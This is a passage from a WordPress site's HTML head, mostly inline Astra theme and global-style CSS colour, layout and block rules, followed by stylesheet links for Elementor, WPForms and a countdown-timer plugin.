			}

			.entry-content .wp-block-media-text.has-background .wp-block-media-text__content {
				padding: 8%;
			}
		}

		.ast-separate-container .entry-content .wp-block-uagb-container {
			padding-left: 0;
		}

		.ast-page-builder-template .entry-header {
			padding-left: 0;
		}

		@media(min-width: 1201px) {
			.ast-separate-container .entry-content>.uagb-is-root-container {
				margin-left: 0;
				margin-right: 0;
			}
		}

		.ast-narrow-container .site-content .wp-block-uagb-image--align-full .wp-block-uagb-image__figure {
			max-width: 100%;
			margin-left: auto;
			margin-right: auto;
		}

		:root .has-ast-global-color-0-color {
			color: var(--ast-global-color-0);
		}

		:root .has-ast-global-color-0-background-color {
			background-color: var(--ast-global-color-0);
		}

		:root .wp-block-button .has-ast-global-color-0-color {
			color: var(--ast-global-color-0);
		}

		:root .wp-block-button .has-ast-global-color-0-background-color {
			background-color: var(--ast-global-color-0);
		}

		:root .has-ast-global-color-1-color {
			color: var(--ast-global-color-1);
		}

		:root .has-ast-global-color-1-background-color {
			background-color: var(--ast-global-color-1);
		}

		:root .wp-block-button .has-ast-global-color-1-color {
			color: var(--ast-global-color-1);
		}

		:root .wp-block-button .has-ast-global-color-1-background-color {
			background-color: var(--ast-global-color-1);
		}

		:root .has-ast-global-color-2-color {
			color: var(--ast-global-color-2);
		}

		:root .has-ast-global-color-2-background-color {
			background-color: var(--ast-global-color-2);
		}

		:root .wp-block-button .has-ast-global-color-2-color {
			color: var(--ast-global-color-2);
		}

		:root .wp-block-button .has-ast-global-color-2-background-color {
			background-color: var(--ast-global-color-2);
		}

		:root .has-ast-global-color-3-color {
			color: var(--ast-global-color-3);
		}

		:root .has-ast-global-color-3-background-color {
			background-color: var(--ast-global-color-3);
		}

		:root .wp-block-button .has-ast-global-color-3-color {
			color: var(--ast-global-color-3);
		}

		:root .wp-block-button .has-ast-global-color-3-background-color {
			background-color: var(--ast-global-color-3);
		}

		:root .has-ast-global-color-4-color {
			color: var(--ast-global-color-4);
		}

		:root .has-ast-global-color-4-background-color {
			background-color: var(--ast-global-color-4);
		}

		:root .wp-block-button .has-ast-global-color-4-color {
			color: var(--ast-global-color-4);
		}

		:root .wp-block-button .has-ast-global-color-4-background-color {
			background-color: var(--ast-global-color-4);
		}

		:root .has-ast-global-color-5-color {
			color: var(--ast-global-color-5);
		}

		:root .has-ast-global-color-5-background-color {
			background-color: var(--ast-global-color-5);
		}

		:root .wp-block-button .has-ast-global-color-5-color {
			color: var(--ast-global-color-5);
		}

		:root .wp-block-button .has-ast-global-color-5-background-color {
			background-color: var(--ast-global-color-5);
		}

		:root .has-ast-global-color-6-color {
			color: var(--ast-global-color-6);
		}

		:root .has-ast-global-color-6-background-color {
			background-color: var(--ast-global-color-6);
		}

		:root .wp-block-button .has-ast-global-color-6-color {
			color: var(--ast-global-color-6);
		}

		:root .wp-block-button .has-ast-global-color-6-background-color {
			background-color: var(--ast-global-color-6);
		}

		:root .has-ast-global-color-7-color {
			color: var(--ast-global-color-7);
		}

		:root .has-ast-global-color-7-background-color {
			background-color: var(--ast-global-color-7);
		}

		:root .wp-block-button .has-ast-global-color-7-color {
			color: var(--ast-global-color-7);
		}

		:root .wp-block-button .has-ast-global-color-7-background-color {
			background-color: var(--ast-global-color-7);
		}

		:root .has-ast-global-color-8-color {
			color: var(--ast-global-color-8);
		}

		:root .has-ast-global-color-8-background-color {
			background-color: var(--ast-global-color-8);
		}

		:root .wp-block-button .has-ast-global-color-8-color {
			color: var(--ast-global-color-8);
		}

		:root .wp-block-button .has-ast-global-color-8-background-color {
			background-color: var(--ast-global-color-8);
		}

		:root {
			--ast-global-color-0: #0170B9;
			--ast-global-color-1: #3a3a3a;
			--ast-global-color-2: #3a3a3a;
			--ast-global-color-3: #4B4F58;
			--ast-global-color-4: #F5F5F5;
			--ast-global-color-5: #FFFFFF;
			--ast-global-color-6: #E5E5E5;
			--ast-global-color-7: #424242;
			--ast-global-color-8: #000000;
		}

		:root {
			--ast-border-color: var(--ast-global-color-6);
		}

		.ast-single-entry-banner {
			-js-display: flex;
			display: flex;
			flex-direction: column;
			justify-content: center;
			text-align: center;
			position: relative;
			background: #eeeeee;
		}

		.ast-single-entry-banner[data-banner-layout="layout-1"] {
			max-width: 1200px;
			background: inherit;
			padding: 20px 0;
		}

		.ast-single-entry-banner[data-banner-width-type="custom"] {
			margin: 0 auto;
			width: 100%;
		}

		.ast-single-entry-banner+.site-content .entry-header {
			margin-bottom: 0;
		}

		header.entry-header .entry-title {
			text-transform: capitalize;
		}

		header.entry-header>*:not(:last-child) {
			margin-bottom: 10px;
		}

		.ast-archive-entry-banner {
			-js-display: flex;
			display: flex;
			flex-direction: column;
			justify-content: center;
			text-align: center;
			position: relative;
			background: #eeeeee;
		}

		.ast-archive-entry-banner[data-banner-width-type="custom"] {
			margin: 0 auto;
			width: 100%;
		}

		.ast-archive-entry-banner[data-banner-layout="layout-1"] {
			background: inherit;
			padding: 20px 0;
			text-align: left;
		}

		body.archive .ast-archive-description {
			max-width: 1200px;
			width: 100%;
			text-align: left;
			padding-top: 3em;
			padding-right: 3em;
			padding-bottom: 3em;
			padding-left: 3em;
		}

		body.archive .ast-archive-description .ast-archive-title,
		body.archive .ast-archive-description .ast-archive-title * {
			font-size: 40px;
			font-size: 2.6666666666667rem;
			text-transform: capitalize;
		}

		body.archive .ast-archive-description>*:not(:last-child) {
			margin-bottom: 10px;
		}

		@media (max-width:921px) {
			body.archive .ast-archive-description {
				text-align: left;
			}
		}

		@media (max-width:544px) {
			body.archive .ast-archive-description {
				text-align: left;
			}
		}

		.ast-breadcrumbs .trail-browse,
		.ast-breadcrumbs .trail-items,
		.ast-breadcrumbs .trail-items li {
			display: inline-block;
			margin: 0;
			padding: 0;
			border: none;
			background: inherit;
			text-indent: 0;
		}

		.ast-breadcrumbs .trail-browse {
			font-size: inherit;
			font-style: inherit;
			font-weight: inherit;
			color: inherit;
		}

		.ast-breadcrumbs .trail-items {
			list-style: none;
		}

		.trail-items li::after {
			padding: 0 0.3em;
			content: "\00bb";
		}

		.trail-items li:last-of-type::after {
			display: none;
		}

		h1,
		.entry-content h1,
		h2,
		.entry-content h2,
		h3,
		.entry-content h3,
		h4,
		.entry-content h4,
		h5,
		.entry-content h5,
		h6,
		.entry-content h6 {
			color: var(--ast-global-color-2);
		}

		.entry-title a {
			color: var(--ast-global-color-2);
		}

		@media (max-width:921px) {

			.ast-builder-grid-row-container.ast-builder-grid-row-tablet-3-firstrow .ast-builder-grid-row>*:first-child,
			.ast-builder-grid-row-container.ast-builder-grid-row-tablet-3-lastrow .ast-builder-grid-row>*:last-child {
				grid-column: 1 / -1;
			}
		}

		@media (max-width:544px) {

			.ast-builder-grid-row-container.ast-builder-grid-row-mobile-3-firstrow .ast-builder-grid-row>*:first-child,
			.ast-builder-grid-row-container.ast-builder-grid-row-mobile-3-lastrow .ast-builder-grid-row>*:last-child {
				grid-column: 1 / -1;
			}
		}

		.elementor-widget-heading .elementor-heading-title {
			margin: 0;
		}

		.elementor-page .ast-menu-toggle {
			color: unset !important;
			background: unset !important;
		}

		.elementor-post.elementor-grid-item.hentry {
			margin-bottom: 0;
		}

		.woocommerce div.product .elementor-element.elementor-products-grid .related.products ul.products li.product,
		.elementor-element .elementor-wc-products .woocommerce[class*='columns-'] ul.products li.product {
			width: auto;
			margin: 0;
			float: none;
		}

		.elementor-toc__list-wrapper {
			margin: 0;
		}

		.ast-left-sidebar .elementor-section.elementor-section-stretched,
		.ast-right-sidebar .elementor-section.elementor-section-stretched {
			max-width: 100%;
			left: 0 !important;
		}

		.elementor-template-full-width .ast-container {
			display: block;
		}

		@media (max-width:544px) {
			.elementor-element .elementor-wc-products .woocommerce[class*="columns-"] ul.products li.product {
				width: auto;
				margin: 0;
			}

			.elementor-element .woocommerce .woocommerce-result-count {
				float: none;
			}
		}

		.ast-header-break-point .main-header-bar {
			border-bottom-width: 1px;
		}

		@media (min-width:922px) {
			.main-header-bar {
				border-bottom-width: 1px;
			}
		}

		.main-header-menu .menu-item,
		#astra-footer-menu .menu-item,
		.main-header-bar .ast-masthead-custom-menu-items {
			-js-display: flex;
			display: flex;
			-webkit-box-pack: center;
			-webkit-justify-content: center;
			-moz-box-pack: center;
			-ms-flex-pack: center;
			justify-content: center;
			-webkit-box-orient: vertical;
			-webkit-box-direction: normal;
			-webkit-flex-direction: column;
			-moz-box-orient: vertical;
			-moz-box-direction: normal;
			-ms-flex-direction: column;
			flex-direction: column;
		}

		.main-header-menu>.menu-item>.menu-link,
		#astra-footer-menu>.menu-item>.menu-link {
			height: 100%;
			-webkit-box-align: center;
			-webkit-align-items: center;
			-moz-box-align: center;
			-ms-flex-align: center;
			align-items: center;
			-js-display: flex;
			display: flex;
		}

		.ast-header-break-point .main-navigation ul .menu-item .menu-link .icon-arrow:first-of-type svg {
			top: .2em;
			margin-top: 0px;
			margin-left: 0px;
			width: .65em;
			transform: translate(0, -2px) rotateZ(270deg);
		}

		.ast-mobile-popup-content .ast-submenu-expanded>.ast-menu-toggle {
			transform: rotateX(180deg);
			overflow-y: auto;
		}

		.ast-separate-container .blog-layout-1,
		.ast-separate-container .blog-layout-2,
		.ast-separate-container .blog-layout-3 {
			background-color: transparent;
			background-image: none;
		}

		.ast-separate-container .ast-article-post {
			background-color: var(--ast-global-color-5);
			;
		}

		@media (max-width:921px) {
			.ast-separate-container .ast-article-post {
				background-color: var(--ast-global-color-5);
				;
			}
		}

		@media (max-width:544px) {
			.ast-separate-container .ast-article-post {
				background-color: var(--ast-global-color-5);
				;
			}
		}

		.ast-separate-container .ast-article-single:not(.ast-related-post),
		.ast-separate-container .comments-area .comment-respond,
		.ast-separate-container .comments-area .ast-comment-list li,
		.ast-separate-container .ast-woocommerce-container,
		.ast-separate-container .error-404,
		.ast-separate-container .no-results,
		.single.ast-separate-container .site-main .ast-author-meta,
		.ast-separate-container .related-posts-title-wrapper,
		.ast-separate-container.ast-two-container #secondary .widget,
		.ast-separate-container .comments-count-wrapper,
		.ast-box-layout.ast-plain-container .site-content,
		.ast-padded-layout.ast-plain-container .site-content,
		.ast-separate-container .comments-area .comments-title,
		.ast-narrow-container .site-content {
			background-color: var(--ast-global-color-5);
			;
		}

		@media (max-width:921px) {

			.ast-separate-container .ast-article-single:not(.ast-related-post),
			.ast-separate-container .comments-area .comment-respond,
			.ast-separate-container .comments-area .ast-comment-list li,
			.ast-separate-container .ast-woocommerce-container,
			.ast-separate-container .error-404,
			.ast-separate-container .no-results,
			.single.ast-separate-container .site-main .ast-author-meta,
			.ast-separate-container .related-posts-title-wrapper,
			.ast-separate-container.ast-two-container #secondary .widget,
			.ast-separate-container .comments-count-wrapper,
			.ast-box-layout.ast-plain-container .site-content,
			.ast-padded-layout.ast-plain-container .site-content,
			.ast-separate-container .comments-area .comments-title,
			.ast-narrow-container .site-content {
				background-color: var(--ast-global-color-5);
				;
			}
		}

		@media (max-width:544px) {

			.ast-separate-container .ast-article-single:not(.ast-related-post),
			.ast-separate-container .comments-area .comment-respond,
			.ast-separate-container .comments-area .ast-comment-list li,
			.ast-separate-container .ast-woocommerce-container,
			.ast-separate-container .error-404,
			.ast-separate-container .no-results,
			.single.ast-separate-container .site-main .ast-author-meta,
			.ast-separate-container .related-posts-title-wrapper,
			.ast-separate-container.ast-two-container #secondary .widget,
			.ast-separate-container .comments-count-wrapper,
			.ast-box-layout.ast-plain-container .site-content,
			.ast-padded-layout.ast-plain-container .site-content,
			.ast-separate-container .comments-area .comments-title,
			.ast-narrow-container .site-content {
				background-color: var(--ast-global-color-5);
				;
			}
		}

		.ast-plain-container,
		.ast-page-builder-template {
			background-color: var(--ast-global-color-5);
			;
		}

		@media (max-width:921px) {

			.ast-plain-container,
			.ast-page-builder-template {
				background-color: var(--ast-global-color-5);
				;
			}
		}

		@media (max-width:544px) {

			.ast-plain-container,
			.ast-page-builder-template {
				background-color: var(--ast-global-color-5);
				;
			}
		}

		.ast-builder-menu-mobile .main-navigation .menu-item.menu-item-has-children>.ast-menu-toggle {
			top: 0;
		}

		.ast-builder-menu-mobile .main-navigation .menu-item-has-children>.menu-link:after {
			content: unset;
		}

		.ast-hfb-header .ast-builder-menu-mobile .main-header-menu,
		.ast-hfb-header .ast-builder-menu-mobile .main-navigation .menu-item .menu-link,
		.ast-hfb-header .ast-builder-menu-mobile .main-navigation .menu-item .sub-menu .menu-link {
			border-style: none;
		}

		.ast-builder-menu-mobile .main-navigation .menu-item.menu-item-has-children>.ast-menu-toggle {
			top: 0;
		}

		@media (max-width:921px) {
			.ast-builder-menu-mobile .main-navigation .menu-item.menu-item-has-children>.ast-menu-toggle {
				top: 0;
			}

			.ast-builder-menu-mobile .main-navigation .menu-item-has-children>.menu-link:after {
				content: unset;
			}
		}

		@media (max-width:544px) {
			.ast-builder-menu-mobile .main-navigation .menu-item.menu-item-has-children>.ast-menu-toggle {
				top: 0;
			}
		}

		.ast-builder-menu-mobile .main-navigation {
			display: block;
		}

		@media (max-width:921px) {
			.ast-header-break-point .ast-builder-menu-mobile .main-navigation {
				display: block;
			}
		}

		@media (max-width:544px) {
			.ast-header-break-point .ast-builder-menu-mobile .main-navigation {
				display: block;
			}
		}

		:root {
			--e-global-color-astglobalcolor0: #0170B9;
			--e-global-color-astglobalcolor1: #3a3a3a;
			--e-global-color-astglobalcolor2: #3a3a3a;
			--e-global-color-astglobalcolor3: #4B4F58;
			--e-global-color-astglobalcolor4: #F5F5F5;
			--e-global-color-astglobalcolor5: #FFFFFF;
			--e-global-color-astglobalcolor6: #E5E5E5;
			--e-global-color-astglobalcolor7: #424242;
			--e-global-color-astglobalcolor8: #000000;
		}
	</style>
	<link rel='stylesheet' id='wp-block-library-css'
		href='../wp-includes/css/dist/block-library/style.min6a4d.css?ver=6.1.1' media='all'>
	<style id='global-styles-inline-css'>
		body {
			--wp--preset--color--black: #000000;
			--wp--preset--color--cyan-bluish-gray: #abb8c3;
			--wp--preset--color--white: #ffffff;
			--wp--preset--color--pale-pink: #f78da7;
			--wp--preset--color--vivid-red: #cf2e2e;
			--wp--preset--color--luminous-vivid-orange: #ff6900;
			--wp--preset--color--luminous-vivid-amber: #fcb900;
			--wp--preset--color--light-green-cyan: #7bdcb5;
			--wp--preset--color--vivid-green-cyan: #00d084;
			--wp--preset--color--pale-cyan-blue: #8ed1fc;
			--wp--preset--color--vivid-cyan-blue: #0693e3;
			--wp--preset--color--vivid-purple: #9b51e0;
			--wp--preset--color--ast-global-color-0: var(--ast-global-color-0);
			--wp--preset--color--ast-global-color-1: var(--ast-global-color-1);
			--wp--preset--color--ast-global-color-2: var(--ast-global-color-2);
			--wp--preset--color--ast-global-color-3: var(--ast-global-color-3);
			--wp--preset--color--ast-global-color-4: var(--ast-global-color-4);
			--wp--preset--color--ast-global-color-5: var(--ast-global-color-5);
			--wp--preset--color--ast-global-color-6: var(--ast-global-color-6);
			--wp--preset--color--ast-global-color-7: var(--ast-global-color-7);
			--wp--preset--color--ast-global-color-8: var(--ast-global-color-8);
			--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg, rgba(6, 147, 227, 1) 0%, rgb(155, 81, 224) 100%);
			--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg, rgb(122, 220, 180) 0%, rgb(0, 208, 130) 100%);
			--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg, rgba(252, 185, 0, 1) 0%, rgba(255, 105, 0, 1) 100%);
			--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg, rgba(255, 105, 0, 1) 0%, rgb(207, 46, 46) 100%);
			--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg, rgb(238, 238, 238) 0%, rgb(169, 184, 195) 100%);
			--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg, rgb(74, 234, 220) 0%, rgb(151, 120, 209) 20%, rgb(207, 42, 186) 40%, rgb(238, 44, 130) 60%, rgb(251, 105, 98) 80%, rgb(254, 248, 76) 100%);
			--wp--preset--gradient--blush-light-purple: linear-gradient(135deg, rgb(255, 206, 236) 0%, rgb(152, 150, 240) 100%);
			--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg, rgb(254, 205, 165) 0%, rgb(254, 45, 45) 50%, rgb(107, 0, 62) 100%);
			--wp--preset--gradient--luminous-dusk: linear-gradient(135deg, rgb(255, 203, 112) 0%, rgb(199, 81, 192) 50%, rgb(65, 88, 208) 100%);
			--wp--preset--gradient--pale-ocean: linear-gradient(135deg, rgb(255, 245, 203) 0%, rgb(182, 227, 212) 50%, rgb(51, 167, 181) 100%);
			--wp--preset--gradient--electric-grass: linear-gradient(135deg, rgb(202, 248, 128) 0%, rgb(113, 206, 126) 100%);
			--wp--preset--gradient--midnight: linear-gradient(135deg, rgb(2, 3, 129) 0%, rgb(40, 116, 252) 100%);
			--wp--preset--duotone--dark-grayscale: url('#wp-duotone-dark-grayscale');
			--wp--preset--duotone--grayscale: url('#wp-duotone-grayscale');
			--wp--preset--duotone--purple-yellow: url('#wp-duotone-purple-yellow');
			--wp--preset--duotone--blue-red: url('#wp-duotone-blue-red');
			--wp--preset--duotone--midnight: url('#wp-duotone-midnight');
			--wp--preset--duotone--magenta-yellow: url('#wp-duotone-magenta-yellow');
			--wp--preset--duotone--purple-green: url('#wp-duotone-purple-green');
			--wp--preset--duotone--blue-orange: url('#wp-duotone-blue-orange');
			--wp--preset--font-size--small: 13px;
			--wp--preset--font-size--medium: 20px;
			--wp--preset--font-size--large: 36px;
			--wp--preset--font-size--x-large: 42px;
			--wp--preset--spacing--20: 0.44rem;
			--wp--preset--spacing--30: 0.67rem;
			--wp--preset--spacing--40: 1rem;
			--wp--preset--spacing--50: 1.5rem;
			--wp--preset--spacing--60: 2.25rem;
			--wp--preset--spacing--70: 3.38rem;
			--wp--preset--spacing--80: 5.06rem;
		}

		body {
			margin: 0;
			--wp--style--global--content-size: var(--wp--custom--ast-content-width-size);
			--wp--style--global--wide-size: var(--wp--custom--ast-wide-width-size);
		}

		.wp-site-blocks>.alignleft {
			float: left;
			margin-right: 2em;
		}

		.wp-site-blocks>.alignright {
			float: right;
			margin-left: 2em;
		}

		.wp-site-blocks>.aligncenter {
			justify-content: center;
			margin-left: auto;
			margin-right: auto;
		}

		.wp-site-blocks>* {
			margin-block-start: 0;
			margin-block-end: 0;
		}

		.wp-site-blocks>*+* {
			margin-block-start: 24px;
		}

		body {
			--wp--style--block-gap: 24px;
		}

		body .is-layout-flow>* {
			margin-block-start: 0;
			margin-block-end: 0;
		}

		body .is-layout-flow>*+* {
			margin-block-start: 24px;
			margin-block-end: 0;
		}

		body .is-layout-constrained>* {
			margin-block-start: 0;
			margin-block-end: 0;
		}

		body .is-layout-constrained>*+* {
			margin-block-start: 24px;
			margin-block-end: 0;
		}

		body .is-layout-flex {
			gap: 24px;
		}

		body .is-layout-flow>.alignleft {
			float: left;
			margin-inline-start: 0;
			margin-inline-end: 2em;
		}

		body .is-layout-flow>.alignright {
			float: right;
			margin-inline-start: 2em;
			margin-inline-end: 0;
		}

		body .is-layout-flow>.aligncenter {
			margin-left: auto !important;
			margin-right: auto !important;
		}

		body .is-layout-constrained>.alignleft {
			float: left;
			margin-inline-start: 0;
			margin-inline-end: 2em;
		}

		body .is-layout-constrained>.alignright {
			float: right;
			margin-inline-start: 2em;
			margin-inline-end: 0;
		}

		body .is-layout-constrained>.aligncenter {
			margin-left: auto !important;
			margin-right: auto !important;
		}

		body .is-layout-constrained> :where(:not(.alignleft):not(.alignright):not(.alignfull)) {
			max-width: var(--wp--style--global--content-size);
			margin-left: auto !important;
			margin-right: auto !important;
		}

		body .is-layout-constrained>.alignwide {
			max-width: var(--wp--style--global--wide-size);
		}

		body .is-layout-flex {
			display: flex;
		}

		body .is-layout-flex {
			flex-wrap: wrap;
			align-items: center;
		}

		body .is-layout-flex>* {
			margin: 0;
		}

		body {
			padding-top: 0px;
			padding-right: 0px;
			padding-bottom: 0px;
			padding-left: 0px;
		}

		a:where(:not(.wp-element-button)) {
			text-decoration: none;
		}

		.wp-element-button,
		.wp-block-button__link {
			background-color: #32373c;
			border-width: 0;
			color: #fff;
			font-family: inherit;
			font-size: inherit;
			line-height: inherit;
			padding: calc(0.667em + 2px) calc(1.333em + 2px);
			text-decoration: none;
		}

		.has-black-color {
			color: var(--wp--preset--color--black) !important;
		}

		.has-cyan-bluish-gray-color {
			color: var(--wp--preset--color--cyan-bluish-gray) !important;
		}

		.has-white-color {
			color: var(--wp--preset--color--white) !important;
		}

		.has-pale-pink-color {
			color: var(--wp--preset--color--pale-pink) !important;
		}

		.has-vivid-red-color {
			color: var(--wp--preset--color--vivid-red) !important;
		}

		.has-luminous-vivid-orange-color {
			color: var(--wp--preset--color--luminous-vivid-orange) !important;
		}

		.has-luminous-vivid-amber-color {
			color: var(--wp--preset--color--luminous-vivid-amber) !important;
		}

		.has-light-green-cyan-color {
			color: var(--wp--preset--color--light-green-cyan) !important;
		}

		.has-vivid-green-cyan-color {
			color: var(--wp--preset--color--vivid-green-cyan) !important;
		}

		.has-pale-cyan-blue-color {
			color: var(--wp--preset--color--pale-cyan-blue) !important;
		}

		.has-vivid-cyan-blue-color {
			color: var(--wp--preset--color--vivid-cyan-blue) !important;
		}

		.has-vivid-purple-color {
			color: var(--wp--preset--color--vivid-purple) !important;
		}

		.has-ast-global-color-0-color {
			color: var(--wp--preset--color--ast-global-color-0) !important;
		}

		.has-ast-global-color-1-color {
			color: var(--wp--preset--color--ast-global-color-1) !important;
		}

		.has-ast-global-color-2-color {
			color: var(--wp--preset--color--ast-global-color-2) !important;
		}

		.has-ast-global-color-3-color {
			color: var(--wp--preset--color--ast-global-color-3) !important;
		}

		.has-ast-global-color-4-color {
			color: var(--wp--preset--color--ast-global-color-4) !important;
		}

		.has-ast-global-color-5-color {
			color: var(--wp--preset--color--ast-global-color-5) !important;
		}

		.has-ast-global-color-6-color {
			color: var(--wp--preset--color--ast-global-color-6) !important;
		}

		.has-ast-global-color-7-color {
			color: var(--wp--preset--color--ast-global-color-7) !important;
		}

		.has-ast-global-color-8-color {
			color: var(--wp--preset--color--ast-global-color-8) !important;
		}

		.has-black-background-color {
			background-color: var(--wp--preset--color--black) !important;
		}

		.has-cyan-bluish-gray-background-color {
			background-color: var(--wp--preset--color--cyan-bluish-gray) !important;
		}

		.has-white-background-color {
			background-color: var(--wp--preset--color--white) !important;
		}

		.has-pale-pink-background-color {
			background-color: var(--wp--preset--color--pale-pink) !important;
		}

		.has-vivid-red-background-color {
			background-color: var(--wp--preset--color--vivid-red) !important;
		}

		.has-luminous-vivid-orange-background-color {
			background-color: var(--wp--preset--color--luminous-vivid-orange) !important;
		}

		.has-luminous-vivid-amber-background-color {
			background-color: var(--wp--preset--color--luminous-vivid-amber) !important;
		}

		.has-light-green-cyan-background-color {
			background-color: var(--wp--preset--color--light-green-cyan) !important;
		}

		.has-vivid-green-cyan-background-color {
			background-color: var(--wp--preset--color--vivid-green-cyan) !important;
		}

		.has-pale-cyan-blue-background-color {
			background-color: var(--wp--preset--color--pale-cyan-blue) !important;
		}

		.has-vivid-cyan-blue-background-color {
			background-color: var(--wp--preset--color--vivid-cyan-blue) !important;
		}

		.has-vivid-purple-background-color {
			background-color: var(--wp--preset--color--vivid-purple) !important;
		}

		.has-ast-global-color-0-background-color {
			background-color: var(--wp--preset--color--ast-global-color-0) !important;
		}

		.has-ast-global-color-1-background-color {
			background-color: var(--wp--preset--color--ast-global-color-1) !important;
		}

		.has-ast-global-color-2-background-color {
			background-color: var(--wp--preset--color--ast-global-color-2) !important;
		}

		.has-ast-global-color-3-background-color {
			background-color: var(--wp--preset--color--ast-global-color-3) !important;
		}

		.has-ast-global-color-4-background-color {
			background-color: var(--wp--preset--color--ast-global-color-4) !important;
		}

		.has-ast-global-color-5-background-color {
			background-color: var(--wp--preset--color--ast-global-color-5) !important;
		}

		.has-ast-global-color-6-background-color {
			background-color: var(--wp--preset--color--ast-global-color-6) !important;
		}

		.has-ast-global-color-7-background-color {
			background-color: var(--wp--preset--color--ast-global-color-7) !important;
		}

		.has-ast-global-color-8-background-color {
			background-color: var(--wp--preset--color--ast-global-color-8) !important;
		}

		.has-black-border-color {
			border-color: var(--wp--preset--color--black) !important;
		}

		.has-cyan-bluish-gray-border-color {
			border-color: var(--wp--preset--color--cyan-bluish-gray) !important;
		}

		.has-white-border-color {
			border-color: var(--wp--preset--color--white) !important;
		}

		.has-pale-pink-border-color {
			border-color: var(--wp--preset--color--pale-pink) !important;
		}

		.has-vivid-red-border-color {
			border-color: var(--wp--preset--color--vivid-red) !important;
		}

		.has-luminous-vivid-orange-border-color {
			border-color: var(--wp--preset--color--luminous-vivid-orange) !important;
		}

		.has-luminous-vivid-amber-border-color {
			border-color: var(--wp--preset--color--luminous-vivid-amber) !important;
		}

		.has-light-green-cyan-border-color {
			border-color: var(--wp--preset--color--light-green-cyan) !important;
		}

		.has-vivid-green-cyan-border-color {
			border-color: var(--wp--preset--color--vivid-green-cyan) !important;
		}

		.has-pale-cyan-blue-border-color {
			border-color: var(--wp--preset--color--pale-cyan-blue) !important;
		}

		.has-vivid-cyan-blue-border-color {
			border-color: var(--wp--preset--color--vivid-cyan-blue) !important;
		}

		.has-vivid-purple-border-color {
			border-color: var(--wp--preset--color--vivid-purple) !important;
		}

		.has-ast-global-color-0-border-color {
			border-color: var(--wp--preset--color--ast-global-color-0) !important;
		}

		.has-ast-global-color-1-border-color {
			border-color: var(--wp--preset--color--ast-global-color-1) !important;
		}

		.has-ast-global-color-2-border-color {
			border-color: var(--wp--preset--color--ast-global-color-2) !important;
		}

		.has-ast-global-color-3-border-color {
			border-color: var(--wp--preset--color--ast-global-color-3) !important;
		}

		.has-ast-global-color-4-border-color {
			border-color: var(--wp--preset--color--ast-global-color-4) !important;
		}

		.has-ast-global-color-5-border-color {
			border-color: var(--wp--preset--color--ast-global-color-5) !important;
		}

		.has-ast-global-color-6-border-color {
			border-color: var(--wp--preset--color--ast-global-color-6) !important;
		}

		.has-ast-global-color-7-border-color {
			border-color: var(--wp--preset--color--ast-global-color-7) !important;
		}

		.has-ast-global-color-8-border-color {
			border-color: var(--wp--preset--color--ast-global-color-8) !important;
		}

		.has-vivid-cyan-blue-to-vivid-purple-gradient-background {
			background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;
		}

		.has-light-green-cyan-to-vivid-green-cyan-gradient-background {
			background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;
		}

		.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background {
			background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;
		}

		.has-luminous-vivid-orange-to-vivid-red-gradient-background {
			background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;
		}

		.has-very-light-gray-to-cyan-bluish-gray-gradient-background {
			background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;
		}

		.has-cool-to-warm-spectrum-gradient-background {
			background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;
		}

		.has-blush-light-purple-gradient-background {
			background: var(--wp--preset--gradient--blush-light-purple) !important;
		}

		.has-blush-bordeaux-gradient-background {
			background: var(--wp--preset--gradient--blush-bordeaux) !important;
		}

		.has-luminous-dusk-gradient-background {
			background: var(--wp--preset--gradient--luminous-dusk) !important;
		}

		.has-pale-ocean-gradient-background {
			background: var(--wp--preset--gradient--pale-ocean) !important;
		}

		.has-electric-grass-gradient-background {
			background: var(--wp--preset--gradient--electric-grass) !important;
		}

		.has-midnight-gradient-background {
			background: var(--wp--preset--gradient--midnight) !important;
		}

		.has-small-font-size {
			font-size: var(--wp--preset--font-size--small) !important;
		}

		.has-medium-font-size {
			font-size: var(--wp--preset--font-size--medium) !important;
		}

		.has-large-font-size {
			font-size: var(--wp--preset--font-size--large) !important;
		}

		.has-x-large-font-size {
			font-size: var(--wp--preset--font-size--x-large) !important;
		}

		.wp-block-navigation a:where(:not(.wp-element-button)) {
			color: inherit;
		}

		.wp-block-pullquote {
			font-size: 1.5em;
			line-height: 1.6;
		}
	</style>
	<link rel='stylesheet' id='hurrytimer-css'
		href='../wp-content/uploads/hurrytimer/css/d929fb3021f246f36a4d.css?ver=6.1.1' media='all'>
	<link rel='stylesheet' id='wpforms-full-css'
		href='../wp-content/plugins/wpforms-lite/assets/css/wpforms-full.min4a2b.css?ver=1.7.9.1' media='all'>
	<link rel='stylesheet' id='elementor-icons-css'
		href='../wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.mine127.css?ver=5.17.0' media='all'>
	<link rel='stylesheet' id='elementor-frontend-css'
		href='../wp-content/plugins/elementor/assets/css/frontend-lite.min2f56.css?ver=3.10.1' media='all'>
	<link rel='stylesheet' id='elementor-post-6-css'
		href='../wp-content/uploads/elementor/css/post-672b6.css?ver=1674223054' media='all'>
	<link rel='stylesheet' id='elementor-pro-css'
		href='../wp-content/plugins/elementor-pro/assets/css/frontend-lite.min9e95.css?ver=3.8.0' media='all'>
	<link rel='stylesheet' id='elementor-global-css'
		href='../wp-content/uploads/elementor/css/global72b6.css?ver=1674223054' media='all'>
	<link rel='stylesheet' id='elementor-post-2316-css'
		href='../wp-content/uploads/elementor/css/post-23164d4d.css?ver=1674235498' media='all'>
	<link rel='stylesheet' id='google-fonts-1-css'
